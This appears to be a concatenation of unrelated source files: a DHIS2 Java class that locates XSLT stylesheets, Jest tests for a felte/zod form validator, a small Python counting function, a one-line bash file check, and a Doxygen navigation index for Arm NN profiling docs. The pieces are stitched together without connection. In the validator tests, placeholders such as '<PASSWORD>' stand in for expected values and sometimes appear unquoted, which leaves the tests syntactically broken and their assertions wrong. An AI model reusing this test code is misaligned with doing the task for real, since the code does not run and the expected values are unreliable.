* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
import java.io.IOException;
import java.io.InputStream;
import org.amplecode.staxwax.framework.XPathFilter;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.hisp.dhis.external.location.LocationManager;
import org.hisp.dhis.external.location.LocationManagerException;
import org.hisp.dhis.importexport.ImportException;
import org.springframework.core.io.ClassPathResource;
import org.w3c.dom.Node;
/**
 * An XSLT locator based on the dhis LocationManager.
 *
 * It depends on a simple XML transformers configuration file
 * (transform/transforms.xml) mapping tags to stylesheets. The file system
 * (via the LocationManager) is searched first; the classpath is the fallback.
 *
 * @author bobj
 * @version created 30-Apr-2010
 */
public class LocManagerXSLTLocator
    implements XSLTLocator
{
    private static final Log log = LogFactory.getLog( LocManagerXSLTLocator.class );

    private static final String TRANSFORMER_MAP = "transform/transforms.xml";

    private LocationManager locationManager;

    public void setLocationManager( LocationManager locationManager )
    {
        this.locationManager = locationManager;
    }

    /**
     * Resolves the stylesheet mapped to the given tag, searching the file
     * system first and then the classpath.
     *
     * @param identifier the tag attribute identifying the transform
     * @return an InputStream over the mapped stylesheet
     * @throws ImportException when no transform is mapped for the tag, or the
     *         mapped stylesheet cannot be opened
     */
    @Override
    public InputStream getTransformerByTag( String identifier )
        throws ImportException
    {
        Node transformerNode = null;

        String xpath = "/transforms/transform[@tag='" + identifier + "']/xslt";

        log.debug( "xpath search: " + xpath );

        // ---------------------------------------------------------------------
        // Search file system
        // ---------------------------------------------------------------------

        try
        {
            transformerNode = XPathFilter.findNode( locationManager.getInputStream( TRANSFORMER_MAP ), xpath );
        }
        catch ( LocationManagerException ex )
        {
            // Not found, proceed to search in classpath
        }

        if ( transformerNode != null )
        {
            log.info( "Loading transformer from file system: " + transformerNode.getTextContent() );

            try
            {
                return locationManager.getInputStream( "transform/" + transformerNode.getTextContent() );
            }
            catch ( LocationManagerException ex )
            {
                throw new ImportException( "Transformer mapped for format but could not be found on file system: " + transformerNode.getTextContent() );
            }
        }

        // ---------------------------------------------------------------------
        // Search classpath
        // ---------------------------------------------------------------------

        try
        {
            transformerNode = XPathFilter.findNode( new ClassPathResource( TRANSFORMER_MAP ).getInputStream(), xpath );

            // FIX: findNode returns null when the classpath config has no entry
            // for this tag; previously this fell through to getTextContent()
            // and threw an uncaught NullPointerException instead of the
            // documented ImportException.
            if ( transformerNode == null )
            {
                throw new ImportException( "No transformer configured for this format: " + identifier );
            }

            log.info( "Loading transformer from classpath: " + transformerNode.getTextContent() );

            return new ClassPathResource( "transform/" + transformerNode.getTextContent() ).getInputStream();
        }
        catch ( IOException ex )
        {
            throw new ImportException( "No transformer configured for this format: " + identifier );
        }
    }
}
|
import '@testing-library/jest-dom/extend-expect';
import { createForm } from 'felte';
import type { ValidationFunction } from '@felte/common';
import { validateSchema, validator } from '../src';
import type { ValidatorConfig } from '../src';
import * as zod from 'zod';
import { get } from 'svelte/store';
describe('Validator zod', () => {
// Flat schema: empty values yield error strings; valid values clear them to
// null. NOTE(review): the '<PASSWORD>'/'<EMAIL>' string literals look like
// redacted fixtures — restore the real expected values if available upstream.
test('correctly validates', async () => {
  const schema = zod.object({
    email: zod.string().email().nonempty(),
    password: zod.string().nonempty(),
  });
  const mockData = {
    email: '',
    password: '',
  };
  const { validate, errors, data } = createForm({
    initialValues: mockData,
    onSubmit: jest.fn(),
    validate: validateSchema(schema),
  });

  await validate();
  expect(get(data)).toEqual(mockData);
  expect(get(errors)).toEqual({
    email: 'Should be at least 1 characters',
    password: '<PASSWORD>',
  });

  data.set({
    email: '<EMAIL>',
    password: '<PASSWORD>',
  });
  await validate();
  expect(get(errors)).toEqual({
    email: null,
    password: null,
  });
});
test('correctly validates deep form', async () => {
const schema = zod.object({
account: zod.object({
email: zod.string().email().nonempty(),
password: zod.string().nonempty(),
}),
});
const mockData = {
account: {
email: '',
password: '',
},
};
const { validate, errors, data } = createForm({
initialValues: mockData,
onSubmit: jest.fn(),
validate: validateSchema(schema),
});
await validate();
expect(get(data)).toEqual(mockData);
expect(get(errors)).toEqual({
account: {
email: 'Should be at least 1 characters',
password: '<PASSWORD>',
},
});
data.set({
account: {
email: '<EMAIL>',
password: '<PASSWORD>',
},
});
await validate();
expect(get(errors)).toEqual({
account: {
email: null,
password: <PASSWORD>,
},
});
});
// Same flat-schema expectations, but wired through the `extend: validator` /
// `validateSchema` API instead of a `validate` function.
test('correctly validates with extend', async () => {
  const schema = zod.object({
    email: zod.string().email().nonempty(),
    password: zod.string().nonempty(),
  });
  const mockData = {
    email: '',
    password: '',
  };
  const { validate, errors, data } = createForm<
    typeof mockData,
    ValidatorConfig
  >({
    initialValues: mockData,
    onSubmit: jest.fn(),
    extend: validator,
    validateSchema: schema,
  });

  await validate();
  expect(get(data)).toEqual(mockData);
  expect(get(errors)).toEqual({
    email: 'Should be at least 1 characters',
    password: '<PASSWORD>',
  });

  data.set({
    email: '<EMAIL>',
    password: '<PASSWORD>',
  });
  await validate();
  expect(get(errors)).toEqual({
    email: null,
    password: null,
  });
});
test('correctly validates deep form with extend', async () => {
const schema = zod.object({
account: zod.object({
email: zod.string().email().nonempty(),
password: zod.string().nonempty(),
}),
});
const mockData = {
account: {
email: '',
password: '',
},
};
const { validate, errors, data } = createForm<
typeof mockData,
ValidatorConfig
>({
initialValues: mockData,
onSubmit: jest.fn(),
extend: validator,
validateSchema: schema,
});
await validate();
expect(get(data)).toEqual(mockData);
expect(get(errors)).toEqual({
account: {
email: 'Should be at least 1 characters',
password: '<PASSWORD>',
},
});
data.set({
account: {
email: '<EMAIL>',
password: '<PASSWORD>',
},
});
await validate();
expect(get(errors)).toEqual({
account: {
email: null,
password: <PASSWORD>,
},
});
});
test('correctly validates deep form with other validate', async () => {
const schema = zod.object({
account: zod.object({
email: zod.string().email().nonempty(),
password: zod.string().nonempty(),
}),
});
const mockData = {
account: {
email: '',
password: '',
},
};
const { validate, errors, data } = createForm<
typeof mockData,
ValidatorConfig
>({
initialValues: mockData,
onSubmit: jest.fn(),
extend: validator,
validateSchema: schema,
validate: jest.fn(() => ({
account: {
email: 'not an email',
},
})) as ValidationFunction<any>,
});
await validate();
expect(get(data)).toEqual(mockData);
expect(get(errors)).toEqual({
account: {
email: ['not an email', 'Should be at least 1 characters'],
password: '<PASSWORD>',
},
});
data.set({
account: {
email: '<EMAIL>',
password: '<PASSWORD>',
},
});
await validate();
expect(get(errors)).toEqual({
account: {
email: 'not an email',
password: <PASSWORD>,
},
});
});
});
|
def group_similar_items(list):
    """Count how many times each item occurs, print and return the mapping.

    The parameter name ``list`` shadows the built-in; it is kept unchanged
    for backward compatibility with keyword callers.

    Args:
        list: iterable of hashable items.

    Returns:
        dict mapping each distinct item to its occurrence count, in first-seen
        order. (Previously the function only printed the result; returning it
        is a backward-compatible addition.)
    """
    grouped_items = {}
    for item in list:
        # dict.get with a default replaces the explicit membership test.
        grouped_items[item] = grouped_items.get(item, 0) + 1
    print(grouped_items)
    return grouped_items
group_similar_items(["dog", "cat", "cat", "fox", "dog", "elephant"])
# Output: {'dog': 2, 'cat': 2, 'fox': 1, 'elephant': 1} |
#!/bin/bash
# Prints "done" iff the create-daml-app DAR artifact has been built.
# FIX: quote the path so a $HOME containing spaces cannot break the test.
[ -f "$HOME/create-daml-app/target/create-daml-app.dar" ] && echo "done"
<reponame>muthukumaravel7/armnn
// Auto-generated Doxygen navigation-tree index (chunk 46) for the Arm NN
// profiling API documentation. Maps each documentation anchor URL to its
// position in the navtree hierarchy. Do not edit by hand — regenerate with
// Doxygen instead.
var NAVTREEINDEX46 =
{
"classarmnn_1_1profiling_1_1_command_handler.xhtml#a5f937b7610842eb70d0376221da7bb07":[7,0,0,2,5,1],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#a602f1b64401712a87c2ef276f469368d":[7,0,0,2,5,0],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#aa2a07b9715323faee8cd53a623f25c7f":[7,0,0,2,5,4],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#ad201152b05beda61e51e3594ff07c8fe":[7,0,0,2,5,2],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#ad6feb3bc1f64bb41467da55d30e9403f":[7,0,0,2,5,3],
"classarmnn_1_1profiling_1_1_command_handler.xhtml#af5f886492fa5da4ff3cde1769e9da2cb":[7,0,0,2,5,5],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml":[7,0,0,2,6],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#a05aaf089b3b02e13bc728e2c8c94cb4e":[7,0,0,2,6,1],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#a17b980d48f35a31c27a227e8ceae5402":[7,0,0,2,6,3],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#a52df705001d502e24a079bd8e0c1e956":[7,0,0,2,6,2],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#a7a9568e40773e80ab38c1a7dac4e7089":[7,0,0,2,6,4],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#ad88cf21899e5a0ee2d803eabf3f5dd04":[7,0,0,2,6,0],
"classarmnn_1_1profiling_1_1_command_handler_functor.xhtml#aee5d34e255ea616c6b4d6877eb3c9fad":[7,0,0,2,6,5],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml":[7,0,0,2,8],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a17b980d48f35a31c27a227e8ceae5402":[7,0,0,2,8,2],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a1d325215074dcfbf8ba4fdabb105a7ee":[7,0,0,2,8,7],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a4ddaee99a232d0d24005b9919b89ca49":[7,0,0,2,8,4],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a52df705001d502e24a079bd8e0c1e956":[7,0,0,2,8,1],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a56ffeb7b5ba6afe9b338c9fc77c0fdf0":[7,0,0,2,8,5],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a60f4b935c8ceb7bed8f4f44f1239719e":[7,0,0,2,8,0],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a66321e43e3e160eac1c7ca8680c2891b":[7,0,0,2,8,9],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a6679b11d54cda7d1f2f36f000f6b3398":[7,0,0,2,8,6],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a7a9568e40773e80ab38c1a7dac4e7089":[7,0,0,2,8,3],
"classarmnn_1_1profiling_1_1_command_handler_key.xhtml#a94b228ec5f9dab0a70836be60d0e6ba4":[7,0,0,2,8,8],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml":[7,0,0,2,9],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml#a46f9edb3e365423b93373629e9a13509":[7,0,0,2,9,0],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml#a7875d60ac5ca76c70f599367ec61261a":[7,0,0,2,9,2],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml#ab421312295ae76edb4a540900d96103b":[7,0,0,2,9,1],
"classarmnn_1_1profiling_1_1_command_handler_registry.xhtml#ae56042d93e16ea2c1e99233fc0451d51":[7,0,0,2,9,3],
"classarmnn_1_1profiling_1_1_connection_acknowledged_command_handler.xhtml":[7,0,0,2,10],
"classarmnn_1_1profiling_1_1_connection_acknowledged_command_handler.xhtml#a0a4b0531c573c4474c241b778c5f5897":[7,0,0,2,10,1],
"classarmnn_1_1profiling_1_1_connection_acknowledged_command_handler.xhtml#a9552a2b823cb596825478b0bee2be8e4":[7,0,0,2,10,0],
"classarmnn_1_1profiling_1_1_counter.xhtml":[7,0,0,2,11],
"classarmnn_1_1profiling_1_1_counter.xhtml#a3b95c70c6d9c60fe7b25a4fa9bf20ea0":[7,0,0,2,11,3],
"classarmnn_1_1profiling_1_1_counter.xhtml#a58ce26007b307f7e6200e4af7fbf601d":[7,0,0,2,11,10],
"classarmnn_1_1profiling_1_1_counter.xhtml#a599a6c52925234fe9426a1faff288151":[7,0,0,2,11,0],
"classarmnn_1_1profiling_1_1_counter.xhtml#a5a9bff456a4766d40e907c77bee43efe":[7,0,0,2,11,1],
"classarmnn_1_1profiling_1_1_counter.xhtml#a5edaa2326b1410fae32c5253ed0188d8":[7,0,0,2,11,4],
"classarmnn_1_1profiling_1_1_counter.xhtml#a69719c180aafcdf5a25f81a851c74809":[7,0,0,2,11,6],
"classarmnn_1_1profiling_1_1_counter.xhtml#a7aa5f39e2eddecaa9b1b5730c0481b11":[7,0,0,2,11,2],
"classarmnn_1_1profiling_1_1_counter.xhtml#a84079a1f364c37c59230bc52332d8d19":[7,0,0,2,11,11],
"classarmnn_1_1profiling_1_1_counter.xhtml#ab13844df5477a9ab8f13069e3d8abad6":[7,0,0,2,11,9],
"classarmnn_1_1profiling_1_1_counter.xhtml#ad5399f5bba038956f1fbde241bc44096":[7,0,0,2,11,8],
"classarmnn_1_1profiling_1_1_counter.xhtml#ae4a480dde76c2182ba3611d43cc0d109":[7,0,0,2,11,7],
"classarmnn_1_1profiling_1_1_counter.xhtml#af734583ef63236e643f64bc6f3f93c3d":[7,0,0,2,11,5],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml":[7,0,0,2,12],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a0fc9b7d9a197eef913fddc3f2e4e8b74":[7,0,0,2,12,0],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a161604d904508d5b86b459c2c2ace4be":[7,0,0,2,12,24],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a220a83a3433b6da68d41efe07c39b552":[7,0,0,2,12,22],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a38edfdaaf346b8b2ad60ba9ab591fdff":[7,0,0,2,12,18],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a4626db62503c13042a745a40399f8317":[7,0,0,2,12,5],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a59397e9294a483953bdf682f16a8a3cd":[7,0,0,2,12,19],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a63fc4d050f681a84653c1d861e989f45":[7,0,0,2,12,15],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a6d7f92b987338cab6cbfbad8d53a9738":[7,0,0,2,12,8],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a6ec101239653ba9260e1362c5381e81d":[7,0,0,2,12,25],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a74ff6a2d9003a0713863df27450f42ed":[7,0,0,2,12,17],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a82cdaf1dbfea445bda6018760140ab50":[7,0,0,2,12,20],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#aa71d36872f416feaa853788a7a7a7ef8":[7,0,0,2,12,2],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#aa898e858d26d200fbc3788ac6d14fd90":[7,0,0,2,12,12],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#aab31f60f412b119002a465e13d5165f0":[7,0,0,2,12,4],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ab9756dfaf9b36cc51262369a27d1384f":[7,0,0,2,12,23],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#abd87d40b4a54b7e1625cb765768553b9":[7,0,0,2,12,16],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ac9bdbed464222fa06875096a4f373ca8":[7,0,0,2,12,14],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#acf7538e5b98c77d22e3df30360a071a2":[7,0,0,2,12,1],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ad368fc6d788ff64cc25cafe2b40265c6":[7,0,0,2,12,9],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ad742b37bc2beb568e083225f3fd8160b":[7,0,0,2,12,13],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ad9062caad1836f8e6b810e4e97bb19d1":[7,0,0,2,12,7],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ae1e135cd44b3b612ded4decaed61ae1b":[7,0,0,2,12,21],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ae3b7dbaa7317dacbcec25f30f6a16075":[7,0,0,2,12,10],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#aefdd6df4feb698935d16311be966fda5":[7,0,0,2,12,6],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#af55b37f13ace15889ce8a0b18dda3ed9":[7,0,0,2,12,3],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#afcb72c4151fd72abfffcb7dae0ed2817":[7,0,0,2,12,11],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml":[7,0,0,2,14],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#a332eb20cab18c17fb869168dc493514e":[7,0,0,2,14,2],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#a40f23e39c9e564d9276caa8d8331aa47":[7,0,0,2,14,3],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#a4c014af62ced747fc2ebbbc312f9845f":[7,0,0,2,14,4],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#ad019be329c6a01c1d3fb93239f2ecded":[7,0,0,2,14,0],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#ad7cf6a514144f22d94542b8d7b833640":[7,0,0,2,14,1],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#af82f4acaed7bb39d568e689a9caa63d5":[7,0,0,2,14,5],
"classarmnn_1_1profiling_1_1_counter_set.xhtml":[7,0,0,2,15],
"classarmnn_1_1profiling_1_1_counter_set.xhtml#a58ce26007b307f7e6200e4af7fbf601d":[7,0,0,2,15,3],
"classarmnn_1_1profiling_1_1_counter_set.xhtml#a946b6d2db711c642a3d5c9272269956d":[7,0,0,2,15,0],
"classarmnn_1_1profiling_1_1_counter_set.xhtml#ab13844df5477a9ab8f13069e3d8abad6":[7,0,0,2,15,2],
"classarmnn_1_1profiling_1_1_counter_set.xhtml#ab4676c63d2f2d14922a8f7cc768d1618":[7,0,0,2,15,1],
"classarmnn_1_1profiling_1_1_device.xhtml":[7,0,0,2,18],
"classarmnn_1_1profiling_1_1_device.xhtml#a28e8394686112e495caf069eb46b44ca":[7,0,0,2,18,1],
"classarmnn_1_1profiling_1_1_device.xhtml#a58ce26007b307f7e6200e4af7fbf601d":[7,0,0,2,18,3],
"classarmnn_1_1profiling_1_1_device.xhtml#a8e96a434397eee3db8703fb58a477b8f":[7,0,0,2,18,0],
"classarmnn_1_1profiling_1_1_device.xhtml#ab13844df5477a9ab8f13069e3d8abad6":[7,0,0,2,18,2],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml":[7,0,0,2,19],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#a41a25ce1deeb5ac0ddbaa99bba961dc6":[7,0,0,2,19,4],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#a439df5e87f9c6e2bb674d0ddf9ccc07e":[7,0,0,2,19,0],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#a7877b37f88f6d9d8743b492a2970c837":[7,0,0,2,19,3],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#a7ea1ce1121a51bbea9ea973c3a1463bb":[7,0,0,2,19,2],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#adfaa32654e05eab63b2adc34b2138475":[7,0,0,2,19,1],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml":[7,0,0,2,20],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a0f9aecd570c4e5e6d41337f0e2f1adf5":[7,0,0,2,20,2],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a1adbda8257d3a74a0566e0d8407ff458":[7,0,0,2,20,4],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a42eb542b5a1d73d00c4ce474140bb78c":[7,0,0,2,20,5],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a5cd8e59fba0c1b4f5e9b09de59a75951":[7,0,0,2,20,0],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a91bdc9d5497d47f5d707418beb83b140":[7,0,0,2,20,3],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#af05e56dee203f12a40d407ef64023467":[7,0,0,2,20,1],
"classarmnn_1_1profiling_1_1_holder.xhtml":[7,0,0,2,21],
"classarmnn_1_1profiling_1_1_holder.xhtml#a95c8634416821480a8140c87054718f6":[7,0,0,2,21,1],
"classarmnn_1_1profiling_1_1_holder.xhtml#aa0e031cc1a69643fc80783201454b428":[7,0,0,2,21,0],
"classarmnn_1_1profiling_1_1_holder.xhtml#ae904af7c6336ceeeb95ab8435047c7cb":[7,0,0,2,21,2],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml":[7,0,0,2,22],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a1179976118abc3d6765a5b2fea4be35c":[7,0,0,2,22,0],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a33b3b8d541860022fe9edecfee7284d6":[7,0,0,2,22,1],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a3af5b700b06e401119749bd3a80bacf0":[7,0,0,2,22,2],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a691685749cd1a917b8e6e9cb1afcc045":[7,0,0,2,22,7],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a93ee1c2509b9db845936a291b575dd17":[7,0,0,2,22,6],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a9b9e803df01765cbfe9c9148fe757db5":[7,0,0,2,22,4],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#ab159fe93b4a4357f55b55920e03b9af6":[7,0,0,2,22,3],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#af3bab90857bb0cd2363f654cdd257e34":[7,0,0,2,22,5],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml":[7,0,0,2,23],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#a5a1d4c34ead611b06c3eae53f2ff47e8":[7,0,0,2,23,4],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#a73cd771233a88545d3623f35c1fad4d4":[7,0,0,2,23,1],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#a7877cff32ce673cece82591034759a62":[7,0,0,2,23,3],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#a9aeb82fc99434b8847b6274868cce79e":[7,0,0,2,23,0],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#af34a12973d15f31aaec7cf6fee34ffa3":[7,0,0,2,23,2],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml":[7,0,0,2,24],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a033cae4e6d00fc1958f79f09216a3437":[7,0,0,2,24,4],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a18c16b4ff70efb2663a4c4c1144babee":[7,0,0,2,24,0],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a2d5f60e55b59ae8667ff593b5bfc5deb":[7,0,0,2,24,7],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a3712fbb9506d016ac2ed7d56b8788a16":[7,0,0,2,24,5],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a49c88b0e052621f30462c3bdbf3e4a7a":[7,0,0,2,24,6],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#abb12c72b032fda64ab5a596f5e49fc56":[7,0,0,2,24,2],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#acc2e97eddda6324261ba202634cc8ef8":[7,0,0,2,24,3],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#ad0faa8a317506b2e72252f087c7f3c46":[7,0,0,2,24,1],
"classarmnn_1_1profiling_1_1_i_consumer.xhtml":[7,0,0,2,25],
"classarmnn_1_1profiling_1_1_i_consumer.xhtml#a4b4fe1cfea0198d9defd88178f073365":[7,0,0,2,25,1],
"classarmnn_1_1profiling_1_1_i_consumer.xhtml#a70e3766f4088883274c4daa1941f03b9":[7,0,0,2,25,0],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml":[7,0,0,2,26],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a228989d3c53e86e779567ca5c2033ec2":[7,0,0,2,26,10],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a67693dcf840ffeadc066ce77ef7b2044":[7,0,0,2,26,7],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a718a75d4c178cf3f687b3f27b8f55091":[7,0,0,2,26,1],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a81881e3910b23455b46ec30c8420c695":[7,0,0,2,26,4],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a8908490db3b8a0003a639ac56b956cee":[7,0,0,2,26,9],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a90890aee41059d8fed244538acc4044f":[7,0,0,2,26,2],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a98e6769cb933d30bfd3ca25f61bd8438":[7,0,0,2,26,12],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#ab43b0472c37fe51694977ae9b4132404":[7,0,0,2,26,3],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#acab78d0987a9cca5a9cac957be610a7d":[7,0,0,2,26,5],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#ad5186479ccb3343cad2dcf8a288bede1":[7,0,0,2,26,0],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#ad9fa9b8364fcaa2c940ef8e78eff8df2":[7,0,0,2,26,6],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#aecd5912045fd41fe41dc96c9844f6deb":[7,0,0,2,26,11],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#aef59fdca57a5bb822e22cacfc5836fab":[7,0,0,2,26,8],
"classarmnn_1_1profiling_1_1_i_counter_mappings.xhtml":[7,0,0,2,27],
"classarmnn_1_1profiling_1_1_i_counter_mappings.xhtml#a83e6db8d13e21158334ca6722b20fa67":[7,0,0,2,27,2],
"classarmnn_1_1profiling_1_1_i_counter_mappings.xhtml#a8c03a58ac20b34e541bad78df16859e8":[7,0,0,2,27,1],
"classarmnn_1_1profiling_1_1_i_counter_mappings.xhtml#aff478703ba6af2360a04c1f0e00911b4":[7,0,0,2,27,0],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml":[7,0,0,2,28],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#a0338e5b744c9c2d08143cf70d319940f":[7,0,0,2,28,3],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#a1d4c2bc2310f063afdf3691f3228012f":[7,0,0,2,28,2],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#a552c43eab6a2ba99f68f98802631db8e":[7,0,0,2,28,4],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#ae975a04ac3e352f5ed0c13501a684cb5":[7,0,0,2,28,0],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#aefa3b1cd8c21711b682a9291c0203a8f":[7,0,0,2,28,1],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml":[7,0,0,2,29],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml#a0dd0b11d60c79e8c89ed1b851a45030d":[7,0,0,2,29,2],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml#a4586c90cbeb7804b32dad8c1bd6ae242":[7,0,0,2,29,1],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml#a4dc7ecb0d192d6cccc9287daaf0eca0f":[7,0,0,2,29,3],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml#a9ded593bdc39f70c3e135e649ab3e42e":[7,0,0,2,29,0],
"classarmnn_1_1profiling_1_1_i_periodic_counter_capture.xhtml":[7,0,0,2,30],
"classarmnn_1_1profiling_1_1_i_periodic_counter_capture.xhtml#a1d4f3d9132cded687954cab389a6d608":[7,0,0,2,30,0],
"classarmnn_1_1profiling_1_1_i_periodic_counter_capture.xhtml#a4d7bebcc22c1b09cf961b83bf84033b6":[7,0,0,2,30,2],
"classarmnn_1_1profiling_1_1_i_periodic_counter_capture.xhtml#a63ce9b9c6710c0dae98f88d6c602313a":[7,0,0,2,30,1],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml":[7,0,0,2,31],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#a8a3511046982c64efa3e3833d749e5ef":[7,0,0,2,31,2],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#a8c5a75b8ee005a7aa9391f3991480d74":[7,0,0,2,31,0],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#a935e16d85893a31f23cd78e47b85466d":[7,0,0,2,31,3],
